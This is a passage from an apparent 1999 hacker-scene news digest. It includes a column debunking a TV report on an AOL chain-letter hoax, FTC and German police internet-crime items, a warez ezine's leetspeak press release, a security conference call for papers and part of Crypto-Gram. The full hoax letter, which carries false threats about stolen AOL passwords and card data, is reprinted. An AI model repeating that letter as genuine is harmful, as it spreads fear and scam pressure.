http://dispatches.azstarnet.com/joe/1999/0518-926992417.htm Hacking the boob tube By Joe Salkowski StarNet Dispatches Tue May 18 00:23:01 1999 Head for the hills, everyone: A "hacker group" is conspiring to "create problems in your personal life." At least, that's the word from the crack investigative reporters at KOLD, Channel 13, Tucson's CBS television affiliate. The station that patrols Tucson's skies in its very own rent-to-own helicopter led its 10 p.m. "news"-cast last Wednesday with a threatening Internet story that apparently escaped the attention of lesser, ground-hugging journalists. "They say they have your personal information, including credit card numbers and Social Security numbers," anchor Chris Pickel warned in her most ominous tone. "And unless you do as they say, they're going to use it against you." Co-anchor Randy Garsee went on to explain that a "hacker group" was sending out e-mail messages threatening to divulge personal information from recipients' America Online accounts unless they forwarded the message to 10 AOL users within 45 minutes. The report, accompanied by a grammatically challenged "You Got Mail" graphic, was delivered with the breathless rush of a Lewinsky-level scoop. "Does AOL know about this?" Garsee asked reporter Valerie Cavazos. "Well," she responded with barely suppressed glee, "they do now." Indeed. They know, like most Net users should, that KOLD fell hard for one of the oldest, lamest tricks on the Net. The menacing message that consumed three minutes of supposedly precious airtime was nothing more than a chain letter - the sort that promises ten years of bad luck will befall those who don't send it along. No "hacker group" or anyone else could carry out the threats contained in the message, and nobody who knew anything about the Net would pass it along. But KOLD didn't think twice - or even once - before passing the threats along to a few thousand viewers. "This is not as thorough as we probably could have been," KOLD News Director Carolyn Kane conceded the next day. "Our follow up will say that the only way to get yourself in trouble is to fall for this letter." The story began when Chris Lamb, a 40-year-old warehouse manager for a local pet supply company, phoned KOLD Wednesday to ask about the e-mail message he'd just received from a friend. "I called just to see if they had heard anything about it," he said. "I didn't realize what would happen then." Lamb, who admits he's "not the most computer-literate person," said he wasn't sure the message was authentic. "That's kind of what I mentioned to Channel 13," he said. "But they said they wanted to do the story." AOL's main office in Virginia was closed by the time Cavazos got the story, Kane said. So the reporter talked to someone at AOL's local telephone support center who didn't know anything about the message or its claims. Instead of waiting until the next day for an intelligent response from AOL, Cavazos and her editors decided to air her story that night. "AOL says that this is the first time that they've heard about it and are now frantically trying to figure out if this was a prank or if the hacker group did indeed figure out a way to get into sensitive AOL files," Cavazos reported. She used the word "frantically" again later in her report, suggesting she had a telepathic grasp of happenings inside AOL's headquarters - which were, you'll remember, closed for the night. Cavazos offered some details from the letter, including its threat that recipients' AOL account would be "messed around with." She also hinted that a "hacker group" could indeed have "cracked" the password to AOL's secret files, a point she illustrated by displaying a Web site with black-market copies of consumer software programs. Had she instead displayed a clown painting on black velvet, it would have been equally relevant. The fact that consumer software can be "cracked" doesn't prove that a "hacker group" could access the entirety of AOL's account information by figuring out a single password, as the message claimed could be done. That feat is, in fact, impossible, AOL spokesman Rich D'Amato told me the next day. While he wouldn't divulge how AOL secures that data, he said it wasn't sitting behind a single password on a public Web server. "That's a safe assumption," he said. "If someone says they have all your personal information, you should react to that the same way you would in real life," D'Amato said. "Take a moment think about it. Don't knee-jerk react to it." But there wasn't much thinking going on at KOLD last Wednesday. In fact, it didn't even bother Cavazos that Lamb, the lone on-camera source of her story, isn't an AOL subscriber - meaning he couldn't possibly have been affected by the threats. Viewers learned this only when Garsee asked Cavazos after her report if Lamb obeyed the commands in the message and what happened if he didn't. "He doesn't know that. Nothing has happened so far. Um, he actually was not an AOL user," she stammered. "So it hasn't affected his AOL program." So let's get this straight: KOLD led its newscast with a story about a "hacker group" that doesn't exist sending threats that couldn't possibly be carried out to a person who couldn't have been harmed - all after an announcer promised that "For accurate, concise reporting, watch News 13." (For television news reporters who might be reading this story, I'll explain that this qualifies as irony.) When I called Kane, the news director, she began our conversation by defending the story. "We were just saying this is a letter that people had gotten. Valerie did it from that point of view," she said. Later, though, she conceded that her station should have held off on the story. "We really should have had whatever AOL says it was," she said. "That's why I'm insisting we make sure we follow this up." The next night, KOLD's 10 p.m. news included a 30-second segment informing viewers that the message was a hoax. But just to be safe, the anchor advised, don't open e-mail sent from people you don't know. Say what? Oh, never mind. If you ever wonder why ordinary, TV-watchin' folk are so afraid of what they might find on the Internet, this comedy of errors should explain things quite nicely. While many reporters have wised up to the realities of the Net, the talking heads of local television news must have been busy fixing their makeup. Since most local television news reporters are assigned to cover a wide variety of subjects, they aren't likely to become experts in any one of them. But it shouldn't be too much to ask that they apply a little common sense and basic reporting skills before airing stories that ultimately mislead and confuse their unfortunate audience. Kane told me her news team would have more Internet related stories in the near future, but I'm not sure I can bear to watch. Before they do another story about the Net, they really ought to dip into their helicopter budget and purchase a clue. Text of "hacker" e-mail (WARNING: Contains profanity) Your Screen Name has Been Added to the ß(r)řöôĄ Ł• Hackers List! Here is how we work. Because we master AOL everytime this letter is sent out a copy is also instantly send to us. We then scan out all the names, and place them on our hackers list. Once you send out this letter 10 times your name again is instantly removed from our list. If this letter is not sent out exactly 45 minutes after you have opened it your name will not be able to be removed from our hacking list. Here is what happened when your name is stuck on the ß(r)řöôĄ Ł• hackers list. -Your AOL password is pulled out of AOL's files. Stupidly AOL stores your password on a password access website. We have cracked the password needed and have access to every account except for AOL guides (cat guides). -We gain your credit card number, social security number, and home address. Your credit card information and home address is stored at the AOL site and with that we can gain you social security number. -Everytime you sign on AOL your account will be messed around with. -and much, much more with the power of ß(r)řöôĄ Ł• hackers. Don't believe this? We don't care at all because not following the directions given will harm you in over 10 ways. All you have to do is send this out to 10 people and you will never have to worry about this again. If you receive this letter again after sending it out you don't need to send it out again, because your name is not able to be put back on. Why are we doing this? It is to get back at AOL, and we are taking action. When the members of ß(r)řöôĄ Ł• hackers first signed up for AOL they were not hackers. Once they had to start paying 21 dollars for AOL they decided to fuck over AOL. Also the ß(r)řöôĄ Ł• hackers are doing this because of the many ads on AOL. When you first sign on AOL you receive too many ads and shit when you go to AOL channels, and more pop ads when you click on things. We have had enough! That's why ß(r)řöôĄ Ł• exists. All you must do now is send this to 10 other AOL members and you will never again have to worry about ß(r)řöôĄ Ł• hackers. SEND THIS OUT NOW TO 10 PEOPLE IF YOU WANT TO SAVE YOUR ACCOUNT, CREDIT CARD, AND MUCH MORE! @HWA 34.0 Unknown spammer gets sued ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ FTC Sues Unknown Spammer "Anyway" contributed by webmaster The Federal Trade Commission has announced that it has filed a suit in the U.S. District Court in Charlotte against an unknown defendant. The individual, who is unknown at this time is accused of sending spam as part of a telemarketing scam. The FTC predicts that they will have enough information to name a suspect within a few days. A choice quote from the article, "Anonymity doesn't necessarily stand in the way of some kind of law enforcement," said Eileen Harrington, the FTC's associate director of marketing practices. "We sued them anyway." Pretty soon we'll have them suing "unknown hackers" for million dollar damages. Oh, wait that already is happening isn't it? ABC News http://www.abcnews.go.com/sections/tech/DailyNews/spamscam990518.html Spam Scam Creator Sued Junk E-Mail Prompts Consumer Calls Overseas By Kalpana Srinivasan The Associated Press W A S H I N G T O N, May 18 — Clifton Taylor’s 12-year-old grandson was doing his homework on the Internet when he received an e-mail message saying his order for a purchase had been processed and $375 would be billed to his credit card in the next two days. To cancel the order that he had never placed, the 7th-grader was supposed to call the number on the screen immediately. But instead of a consumer representative, on the other end was a pornographic recording from a site in the West Indies. The international toll call popped up on the family’s phone bill shortly after. “This approach was so different it caught us by surprise,” said Taylor, a retired school teacher living outside of Charlotte, N.C. The scheme — a combination of spamming, or junk e-mail, and telemarketing fraud — has already prompted 20,000 consumers to complain to America Online. Suit Filed Against Scam Mastermind The Federal Trade Commission today was announcing a suit filed in U.S. District Court in Charlotte against the unknown defendant who masterminded the scam. The agency says this action — the first taken against an unnamed perpetrator — is a warning to con artists who try to hide behind the vast, faceless Internet. “Anonymity doesn’t necessarily stand in the way of some kind of law enforcement,” said Eileen Harrington, the FTC’s associate director of marketing practices. “We sued them anyway.” Harrington predicts the commission will have enough information to name a defendant in a few days. In the meantime, the court order has blocked the flow of money from American telephone carriers to the foreign telephone company that pays the operators of the hotline. Breaking Through Forged Addresses The case highlights some of the inherent challenges in tracking down and stopping the senders of junk e-mail, also known as spam. A common tactic among con artists sending spam, including those cited in today’s action, is to use a variety of forged e-mail addresses so they cannot be reached. Ray Everett-Church, co-founder of the Coalition Against Unsolicited Commercial E-Mail, likens the problem to the arcade game “whack-a-mole”: no sooner does the mole get hit by the mallet in once place, than it pops up quickly in another. “Spammers rapidly move from sending site to sending site,” said Everett-Church. That makes it futile for a server provider to block one specific e-mail address. But, he added, companies can block e-mails based on their content, for example filtering out all messages that contain a particular word or telephone number. “The problem comes in finding similarities you can block,” he said. FTC Creating a Spammer DB The FTC says it is raising the ante against fraud with its own technology. More than a year ago, the commission began collecting spam forwarded to it by consumers, creating a database with hundreds of thousands of messages in it. The commission first learned of the scheme after a consumer submitted an online complaint form — one of about 10,000 the FTC receives each week. Using the information provided by the consumer, the FTC ran a database search and came up with dozens of matches containing the same telephone number. “This technology has given us an enormous leg up against scams that use technology,” said Harrington. The agency was able to pull together a case in a few weeks. AOL Cooperated With FTC AOL has a similar mechanism for receiving forwarded junk e-mail. The company has passed on its complaints about the scam in question, plus copies of the actual spam to the FTC, said Rich D’Amato, a spokesman for Dulles, Va.-based AOL. The FTC has asked the court for the money already paid by customers to their telephone companies for the toll charges to be put aside for consumer restitution and for the company to be barred from violating the law through its deceptive messages. A successful case against the perpetrators would come as vindication to Taylor. He contacted a litany of people from his phone company to members of Congress to local police to report the matter. Most rebuffed him because he didn’t have enough follow-up information for them to pursue a case. While he was furious about the e-mail, Taylor said his “anger got worse because I couldn’t get anywhere with anybody. The whole thing just completely rubbed me the wrong way.” @HWA 35.0 German Police Crack Down On Internet Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ May 19th Germans Go After Inet Crime contributed by Y0han German officials are hoping to contain the spread of politically extreme matter or, child pornography over the Internet. Deputy Interior Minister Claus Henning Schapper recently announced that German police are developing an Internet search engine that will zero in on illegal activity on the Web such as pedophile networks and neo-Nazi propaganda. Yahoo News http://biz.yahoo.com/rf/990517/i7.html Monday May 17, 7:44 am Eastern Time German police develop Internet crime-buster BONN, May 17 (Reuters) - German police are developing an Internet search engine that will home in on illegal activity on the Web, including paedophile networks and neo-Nazi propaganda, and lead detectives to those who publish or even view such sites, an official said on Monday. ``It should make it easier for the police to pinpoint criminal content on the Internet, secure evidence and identify the senders and addressees,'' Deputy Interior Minister Claus Henning Schapper told a conference on Internet security in Bonn. ``Using it, we want to contain the spread of, for example, politically extreme matter or, highly important, child pornography over the Internet.'' He gave no further details of the device nor did he say when it might come into operation. @HWA 36.0 After a rather long hiatus BoW resurfaces and releases issue #9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Brotherhood Of Warez was/is an ezine that takes a pisstake approach to the scene and has climbed up from the mire to produce #9 of their series of ezines, numbers 1 thru 8 were released in 1992-1994... From HNN http://www.hackernews.com/ BoW 9 Is Here! contributed by Velkro Kode Warrior BoW Magazine, an electronic ezine started in 1992 as a reaction to the degradation of the so-called "H/P scene" that was around at the time, has after a five year hiatus released its ninth issue. Eight issues of BoW were released from 1992-1994, and now BoW magazine is back with a much overdue ninth issue. BoW #9 http://www.velkro.net./ The Press release; KRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWARE ...:::||| OFFICIAL PRESS RELEASE |||:::... __________ __ .__ .__ .___ \______ \_______ _____/ |_| |__ ___________| |__ ____ ____ __| _/ | | _/\_ __ \/ _ \ __\ | \_/ __ \_ __ \ | \ / _ \ / _ \ / __ | | | \ | | \( <_> ) | | Y \ ___/| | \/ Y ( <_> | <_> ) /_/ | |______ / |__| \____/|__| |___| /\___ >__| |___| /\____/ \____/\____ | \/ \/ \/ \/ \/ _____ __ __ ____ / ____\ / \ / \_____ _______ ____ ________ / _ \ __\ \ \/\/ /\__ \\_ __ \_/ __ \\___ / ( <_> ) | \ / / __ \| | \/\ ___/ / / \____/|__| \__/\ / (____ /__| \___ >_____ \ \/ \/ \/ \/ K-R4D FOR THE AYCH-PEE NAT10N KICKIN IT IN 1999 -**=< BoW Ann0unc3Zz Issu3 N1n3!@#$ >=**- PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW Th4tz r1ght f0lkZz! BoW numb3r n1ne is in the works. The p3ople th4t brought you th3 ever-pheared .rhosts exploit and the exclusive D4l3 dr3w g3rbling photos are str1king b4ck in 1999 w1th m4d T4e-BoW sk1llz. -**=< FuCk St4r W4rs -- R34d BoW!@%#$ >=**- Wh3n M4y 19th r0llz 4r0und, 4nd y0u k4nt g3t 1n t0 s3e St4r W4rs, just s1t b4ck, r3l4x, s4y "Fuck 1t!@#," 4nd gr4b 4 c0py 0f BoW 9. The Numb3r n1ne is a v3ry important number to the 1nner sanktum of BoW. NiNE is the number th4t always returns unto its3lf. Take a look: 9 x 31337 = 282033 2 + 8 + 2 + 0 + 3 + 3 = 18 1 + 8 = 9 < -- try this with *your* favorite number So st4y t00n3d ph0r the BoW Nine Return of the Hack K0m3b4ck Sp3kt4kul4r, and pr3p4re t0 3nter PH34R N4T10N@!#$!!#$$%!& SiGN3D: The BoW Imperial Senate: U4EA / LISTER / PLUVIUS / SW_R / THE DEADKENNEDY THE VELKRO KODE WARRIOR / D-CELLERATION TRAUMA RATSCABIES / KIAD / THE 0WN3D R4NGER K-Rad BoW Affiliates: K0D3Z / ANuS / H4G1S / THE Y0RKSH1R3 P0SS3 / GLuE MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY (K) Kopywrong __________ __ __ ____ ________ ________ ________ \______ \ ____/ \ / \ /_ / __ \/ __ \/ __ \ | | _// _ \ \/\/ / | \____ /\____ /\____ / | | ( <_> ) / | | / / / / / / |______ /\____/ \__/\ / |___| /____/ /____/ /____/ \/ \/ distribute everywhere Spreading the Zeroday Your Way since 1992 The Few, The Pr0ud, Th3 pheared. The BoW. THE BROTHERHOOD OF WAREZ www.velkro.net bow@velkro.net MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY 19 MAY END 0F TR4NZM1ZZi0N... PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW @HWA 37.0 AntiOnline opens up its knowledge database to the pheds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Seen via HNS http://www.net-security.org/ Knowledge Base Applications Monday, May 17, 1999 at 23:06:28 by John Vranesevich - Founder of AntiOnline AntiOnline is pleased to announce that it is now taking applications for access to its knowledge base. Access to this area of AntiOnline will be restricted to military and federal law enforcement personnel only. The knowledge base will provide resources and information which AntiOnline feels is too sensitive to make available to the general public as a whole. In order to gain access to this area of AntiOnline, users are required to fill out and sign the application below, and fax it to the AntiOnline offices (724-773-0941) on official letterhead. AntiOnline will turn over any instances of suspected falsification of records, or any individuals who are suspected of impersonating a federal authority to the proper agencies for investigation. Please Note: Due to high demand, it may take up to 4 weeks to activate an account. Official Request For Access AntiOnline’s Knowledge Base An Interface To The "Omnipotent One" Intelligence System Last Name: __________________________________ First Name: __________________________________ Affiliation: ___________________________________ Rank/Title: ___________________________________ City or APO or FPO: _____________________________________ State or APO/FPO: _______________________________________ Zip Code: _____________________ Commercial Phone: _______________________________________ Commercial FAX: _________________________________________ Official E-mail Address: __________________________________ In order to insure the continued security of the Knowledge Base, AntiOnline requires you to access the system from a static IP address. Furthermore, this address must reverse-resolve back to the organization that you are officially affiliated with. IP Address: ________________________ Address Resolves To: ________________________________ End Page One - Initial Here: _____ To allow AntiOnline staff members to contact you about your account in a secure way, we require that you register your Public PGP Key with AntiOnline’s Public Key Server. Details on how to do this are located at http://www.antionline.com/resources/pgp-key-server/ The key must be registered under the official e-mail address that you listed above. If your organization prohibits the use of PGP Encryption, make a note of it below: PGP Comments: ______________________________________________ I understand that the information contained within “AntiOnline’s Knowledge Base” is considered sensitive. I hereby attest that any information that I obtain from said knowledge base will not be distributed to any third party, with the exception of: 1. any individual affiliated with my organization that I am directly assigned to work with on an official basis. 2. any information which I am subpoenaed or otherwise required to turn over to a court of law as part of a civil or criminal proceeding. I hereby attest that the above information that I provided about myself, the organization that I am affiliated with and its policies, is accurate to the best of my knowledge. I hereby attest that the letterhead which this FAX was originally printed on is the official letterhead of the organization that I am affiliated with, and that I am using it on an official basis in accordance with the policies and procedures set forth to me by said organization. Signed: _________________________________ Print Name: _____________________________ Initial: ________ @HWA 38.0 [ISN] RAID99 Hosted by CERIAS Call for papers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Date: Sun, 16 May 1999 04:00:28 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] RFP -- Upcoming workshop hosted by CERIAS: RAID'99 Message-ID: X-NoSpam: You do not have consent to spam me. X-Attrition: Attrition is only good when forced. http://www.attrition.org X-Copyright: This e-mail copyright 1999 by jericho@dimensional.com where applicable X-Encryption: rot26 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-isn@repsec.com Precedence: bulk Reply-To: cult hero x-unsubscribe: echo "unsubscribe isn" | mail majordomo@repsec.com x-infosecnews: x-loop, procmail, etc Forwarded From: spaf@cs.purdue.edu We're hosting this important workshop in intrusion detection. The deadline for submissions is fast approaching, so we'd like to remind you all to consider making a submission. Call For Participation - RAID'99 Second International Workshop on the Recent Advances in Intrusion Detection Dates: September 7-9, 1999 West Lafayette, Indiana, USA an html version of this CFP is available at http://www.zurich.ibm.com/pub/Other/RAID Corporate Sponsors: The SANS Institute IBM Business Recovery Services Emergency Response Service This workshop, the second in an ongoing annual series, will bring together leading figures from academia, government, and industry to discuss state-of-the-art intrusion detection technologies, and paradigms and issues from the research and commercial perspectives. The RAID International Workshop series is intended to further progress in intrusion detection by promoting the exchange of ideas in a broad range of topics among researchers, system developers, and users and by encouraging links between these groups. RAID'98, held in Louvain-la-Neuve, Belgium, was the first in an anticipated annual series of international workshops that has brought together leading figures from academia, government, and industry to ponder the current state of intrusion detection technologies and paradigms from the research and commercial perspectives. More than 130 participants attended RAID'98, with nearly 50% from outside Europe, reflecting the international nature of the meeting. RAID'99 is being hosted by the Purdue University CERIAS, in West Lafayette, Indiana, USA. The program committee invites submission of both technical and general interest papers and panels from those interested in formally presenting their ideas during the workshop. This year, we are emphasizing following topic areas: Assessing IDS Accuracy and reliability measurements, requirements, and technologies Benchmarking techniques and technologies Relations to Risk Assessment and Risk Management Plans IDS in High Performance and Real-Time Environments Large-scale/enterprise IDS High-Speed networks Managing high-volume data Highly distributed and heterogeneous environments Vulnerabilities and Attacks New vulnerability or attack databases Vulnerability or attack taxonomies Using vulnerability databases IDS Integration IDS interoperability Standards and Standardization - progress and assessment Integration with the system/network management framework Combining different "styles" of IDS Innovative Approaches Adaptive IDS solutions Survivability and Dependability Data mining, intelligent agents New results related to innovative ways of thinking about IDS, new IDS methodologies and technologies Automated responses Combining IDS and system/network management Practical Considerations Case studies IDS in heterogeneous environments Unique/emerging IDS operating environments, including CORBA, NT, X.509 and VPN. Legal issues (IDS reports as "evidence") Commercial intrusion detection systems and their directions Real-time versus Post-mortem IDS IDS integration with business process Program Committee ***************** General Chair: Gene Spafford (Purdue University, USA) Program Chair: Deborah Frincke (University of Idaho, USA) Program Co-Chair: Ming-Yuh Huang (Boeing Applied Research and Technology, USA) Executive Committee ******************* Marc Dacier (IBM Zurich Research Laboratory, Switzerland) Kathleen Jackson (Los Alamos National Laboratory, USA) Committee Members ***************** Matt Bishop (University of California at Davis, USA) Dick Brackney (National Security Agency, USA) Yves Deswarte (LAAS-CNRS & INRIA, France) Terry Escamilla (IBM, USA) Rowena Chester (University of Tennessee, USA) Tim Grance (National Institute of Standards and Technology, USA) Sokratis Katsikas (University of the Aegean, Greece) Baudouin Le Charlier (Universite de Namur, Belgium) Abdelaziz Mounji (Universite de Namur, Belgium) Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium) Marv Schaefer (Arca Systems, USA) Mark Schneider (National Security Agency, USA) Steve Smaha (Free Agent, USA) Peter Sommer (London School of Economics & Political Science, England) Stuart Staniford-Chen (Silicon Defense, USA) Chris Wee (University of California at Davis, USA) Kevin Ziese (Cisco/Wheelgroup, USA) SUBMISSIONS =========== Papers and panels which fall into the topic areas outlined above are particularly welcome, although contributions outside those topics may also be of interest. Each submission must contain: 1. A separate title page with: The type of submission, The title or topic, The topic category most appropriate for the subject matter; The name(s) of the speaker or panel chair and probable panelists, with their organizational affiliation(s), telephone and FAX numbers, postal address, and Internet electronic mail address. 2. A brief biography of each author or panel participant as appropriate 3. The subject category (see topic list) most appropriate for the paper or panel Paper submissions must include an abstract that is a maximum of 600 words in length on a separate page. This abstract may be accompanied by a lengthier paper, which should be no more than ten pages (12 point font). Although encouraged, it is not necessary to submit a full paper for consideration as a speaker or for inclusion in the proceedings; however, potential speakers providing full paper submissions will be given preference in cases of equal quality. The program committee will allocate each accepted presenter up to 30 minutes for the talk, based on the complexity and interest of the proposed topic and the wishes of the speaker. The presenter will be informed of the presentation slot length when notified of acceptance. Panel submissions must include a description that is a maximum of 300 words. The description should include both an outline of the format of the panel and a short rationale for the panel. The program committee will allocate one to two-hour time slots to each panel, based on the proposed topic, the number of panelists, and the wishes of the panel chair. The panel chair will be informed of the slot length when notified of acceptance. Panels which include time for general discussion and questions/answers for the panelists and the attendees are preferred to those which do not. All proposals must be in English. Plan to give all panels and talks in English. All submissions must be received on or before May 21. We strongly prefer they be submitted electronically to raid99@zurich.ibm.com or raid99@cs.uidaho.edu using one of these formats: ASCII, postscript, Word, or LaTex. All abstracts will be made available on the web. For those submitting full papers, these submissions should be in a format which can be translated to PDF . Full papers will also be made available on the web, and possibly by CD-ROM. If necessary, hardcopy may be sent to the nearest of the following locations (please allow sufficient time for arrival by May 21): European Collection Site Marc Dacier Global Security Analysis Lab IBM Zurich Research Laboratory Saeumerstrasse 4 CH-8803 Rueschlikon Switzerland North/South American Collection Site Ming-Yuh Huang The Boeing Company P.O. Box 3707 MC 7L-20 Seattle WA 98124-2207 U.S.A. Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact raid99@cs.uidaho.edu. A preliminary program will be available at the RAID web site, http://www.zurich.ibm.com/pub/Other/RAID/, by July 21, 1999. Last year's proceedings are available online as well. CORPORATE SPONSORS ================== We solicit interested organizations to become sponsors for RAID '99, particularly in sponsorship of student travel and other expenses for RAID. Please contact Deborah Frincke for information regarding corporate sponsorship of RAID. REGISTRATION ============ Detailed registration information (including fees, suggested hotels, and travel directions) will be provided at the RAID'99 web site. PROCEEDINGS =========== On-line workshop proceedings will be posted on the RAID web site immediately following the workshop. It will include: The final program; A list of corporate sponsors; A list of attendees (subject to each attendee's approval); The submitted abstract and slides used by each speaker; The submitted description and rationale for each panel; The slides used by each panelist; and, Written position statements from each panelist. Last year's most outstanding workshop participants were invited to submit an analogous formal paper to a special RAID edition of the refereed journal "Computer Networks and ISDN Systems." Proceedings from last year may be found at online at http://www.zurich.ibm.com/pub/Other/RAID/. IMPORTANT DATES =============== Deadline for paper, panel submissionMay 21, 1999 Notification of acceptance or rejection July 7, 1999 Registration opens July 15, 1999 Preliminary program posted to web July 15, 1999 Final full paper due (optional)August 7, 1999 On-time Registration closes August 21, 1999 RAID dates September 7-9, 1999 FOR MORE INFORMATION ==================== For further information: On-site arrangements: contact Gene Spafford (spaf@cs.purdue.edu) General program information or corporate sponsorship: contact Deborah Frincke (frincke@cs.uidaho.edu) Paper and panel submission: contact Ming-Yuh Huang (huang@bcstec.ca.boeing.com) -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 39.0 Cryptogram May 15th'99 ~~~~~~~~~~~~~~~~~~~~~~ CRYPTO-GRAM May 15, 1999 by Bruce Schneier President Counterpane Systems schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 1999 by Bruce Schneier ** *** ***** ******* *********** ************* In this issue: The Internationalization of Cryptography News Federal Appeals Court Agrees that Encryption Export Rules are Unconstitutional The Doghouse -- Novell NetWare's Remote Passwords U.S. Crypto Legislation Update Counterpane Systems News Factoring with TWINKLE Comments from Readers ** *** ***** ******* *********** ************* The Internationalization of Cryptography One of the stranger justifications of U.S. export controls is that they prevent the spread of cryptographic expertise. Years ago, the Administration argued that there were no cryptographic products available outside the U.S. When several studies proved that there were hundreds of products designed, built, and marketed outside the U.S., the Administration changed its story. These products were all no good, they argued. Export controls prevent superior American products from getting into foreign hands, forcing them to use inferior non-U.S. products. Nonsense. Cryptography is an international science. Most of the cryptographic conferences are held outside the U.S. Most of the cryptography researchers are at universities outside the U.S., and most cryptographic papers presented at conferences are written outside the U.S. There are more advanced degree programs in cryptography outside the U.S. than there are inside. Researchers outside the U.S. tend to be better funded, and there is more interest in their work. Some of the most important cryptographic research ideas in the past ten years have come from outside the U.S. The U.S. not only does not have a lock on cryptographic research, it does not even have the majority. In 1997, NIST solicited algorithms for the Advanced Encryption Standard, to replace DES as a government encryption standard. Of the fifteen submissions received, ten were from companies and universities outside the U.S: Australia, Belgium, Canada, Costa Rica, England, France, Germany, Israel, Japan, Korea. Of the five submissions likely to be chosen for the next round, about half will be from outside the U.S. It is very possible that the next U.S. government encryption standard will have been designed outside the U.S. The Internet Engineering Task Force has created a series of cryptographic standards for the Internet: secure e-mail, encrypted and authenticated IP packets, secure socket-level communications, key exchange and certificate formats, etc. These meetings are held several times a year, mostly in the U.S. but also outside. Attendees are from companies all over the world, and the standards are written by international consensus. The U.S. has no lock on the content of the standards, nor the evaluation process. These standards are implemented in products built all over the world, not just in the U.S. For example, a Finnish company called SSH has one of the best IPSec -- a standard for IP security -- implementations in the world. Other non-U.S. technology has been integrated into U.S. companies. A Swedish company called COST built a comprehensive cryptographic toolkit. The company was acquired by Entegrity Solutions, Inc., a U.S. startup. Algorithmic Research, and its cryptographic products, was acquired by Cylink Corp. ELVIS+, a Russian company, is now part of the U.S. company TrustWorks, Inc. RSA Data Security, now owned by Security Dynamics Inc., recently purchased the rights to a cryptographic product created in Australia. This list goes on and on. Again and again, U.S. companies have realized that cryptographic expertise is available outside the U.S., and have taken steps to secure that expertise. Cryptography does not stop at national borders. Research, standards, and products are international. Expertise is international. For the U.S. Administration to believe that there are "national secrets" about cryptography that export controls somehow keep inside the U.S. is sheer folly. There is no evidence that this is true, and considerable evidence that the reverse is true. ** *** ***** ******* *********** ************* News Cyberwar is becoming real, maybe. It seems that hackers in Belgrade have attacked NATO's public Web server. Now there's a big difference between attacking a Web site and attacking actual war-fighting computers, but still... http://www.pcworld.com/cgi-bin/pcwtoday?ID=10358 See also: http://www.zdnet.com/zdnn/stories/news/0,4586,2220773,00.html And hackers have done damage in protest to to NATO's accidental bombing of the Chinese embassy in Belgrade. A number of U.S. government sites were hacked, including those of the Department of the Interior, the Department of Energy, and the U.S. embassy in China. http://www.zdnet.com/zdnn/stories/news/0,4586,2256138,00.html This item is more interesting, if it's true. According to this news report, which I can't confirm anywhere, the Serbs used a CIA mobile phone and security identification codes to call in a NATO air strike on a civilian convoy. http://www.theherald.co.uk/news/archive/19-4-1999-0-9-58.html More credible is the story that the Serbs are eavesdropping on NATO unencrypted radio links. http://www.washingtonpost.com/wp-srv/WPlate/1999-05/01/169l-050199-idx.html A cat lost an English bus company a Ł20,000 contract after falling asleep on a fax machine and sending confidential information to a rival firm. http://www.telegraph.co.uk/et?ac=000647321007942&rtmo=Q9Qw9p3R&atmo=KKKKKKrM &pg=/et/99/4/19/ncat19.html KeyNote v2, a toolkit for handling trust management issues, has been released in beta. KeyNote is a small, flexible trust management system designed by Matt Blaze, Joan Feigenbaum, and others, suitable for Internet-style applications. KeyNote description: ftp://ftp.research.att.com/dist/mab/knrfc.txt Beta release of the KeyNote toolkit: http://www.cis.upenn.edu/~angelos/keynote.html Crypto++ 3.1, a free C++ crypto class library, has just been released. This version fixes some bugs and adds more AES candidates as well as a couple of MAC constructions based on block ciphers. http://www.eskimo.com/~weidai/cryptlib.html Starium will soon be selling voice encryption add-ons for telephones. They'll be using 2048-bit Diffie-Hellman for key exchange, and triple-DES for voice encryption. Price will be around $100. And unlike AT&T, these guys probably won't bend to government pressure to add key escrow to their protocols (remember Clipper). http://www.starium.com See also: http://www.eetimes.com/story/OEG19990423S0015 This is a terrifying one. A U.S.-led international organization of police and security agencies is trying to push through laws to mandate eavesdropping points for Web sites and other forms of digital communication. "The plans require the installation of a network of tapping centers throughout Europe, operating almost instantly across all national boundaries, providing access to every kind of communications including the net and satellites. A German tapping center could intercept Internet messages in Britain, or a British detective could listen to Dutch phone calls. There could even be several tapping centers listening in at once. The full story: http://www.heise.de/tp/english/special/enfo/6398/1.html Another story: http://www.newsunlimited.co.uk/The_Paper/Weekly/Story/0,3605,45981,00.html Also see: http://www.heise.de/tp/english/special/enfo/6397/1.html The document is Enfopol 19, a restricted document leaked to the London-based Foundation for Information Policy Research: http://www.fipr.org/polarch/index.html Cool Internet Explorer security bugs: Someone else using your computer can see where you've been browsing. Someone else using your computer can access your password-protected Web sites. http://www.zdnet.com/anchordesk/story/story_3351.html http://www.zdnet.com/zdnn/stories/news/0,4586,1014586,00.html Think computer privacy is a problem? Here's how it works in the real world. This was originally published in the 14 March 1999 New York Times magazine section. http://archives.nytimes.com/archives/search/fastweb?getdoc+allyears2+db365+3 